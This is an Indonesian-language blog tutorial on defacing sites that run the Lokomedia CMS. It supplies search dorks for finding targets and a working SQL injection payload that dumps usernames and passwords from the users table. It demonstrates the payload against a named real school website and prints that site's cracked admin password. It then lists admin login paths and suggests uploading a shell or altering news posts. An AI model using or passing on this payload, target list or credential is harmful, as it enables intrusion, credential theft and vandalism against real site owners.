Cara Deface Dengan Metode SQL Lokomedia

Bahan - Bahan :
1. Dork : inurl:/statis-1-profil.html
               inurl:/statis-2-profil.html

               inurl:/statis-3-profil.html
     *nomer nya bisa di ubah agar bisa dapet yg fresh hehe 
2. Exploit :

$ 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,0x3c2f7469746c653e,username,password)),@)--+

Kalian bisa dorking memakai dork yg di atas tadi
Disini saya sudah mempunyai live target : http://www.smaitnurhidayah.sch.id/statis-1-profil.html
Lalu kita masukan exploit nya di bagian setelah angka jadi seperti ini

$ http://www.smaitnurhidayah.sch.id/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,0x3c2f7469746c653e,username,password)),@)--+-profil.html

- Dan user dan password nya pun muncul di bagian atas

- Jika sudah dapat user dan password nya tapi password nya masih berbentuk MD5, maka kita harus mendecrypt password tersebut menggunakan Hash Killer 
- Kalian bisa mendecrypt password tersebut disini
- Mari kita decrypt password tersebut, dan dan hasilnya seperti ini

- Dan ternyata password nya itu adalah : 12oktober2008
- Setelah itu kalian tinggal login ke halaman admin 
- Untuk login cms lokomedia biasanya di
   -site.com/admin
   -site.com/adminweb
   -site.com /redaktur
   -site.com/administrator
- Jika sudah menemukan admin login nya kalian bisa upload shell atau edit berita entahlah sesuka kalian

Oke mungkin cukup sekian tutorial kali ini 
see you on the next tutorial babay.. 

Related Posts:

---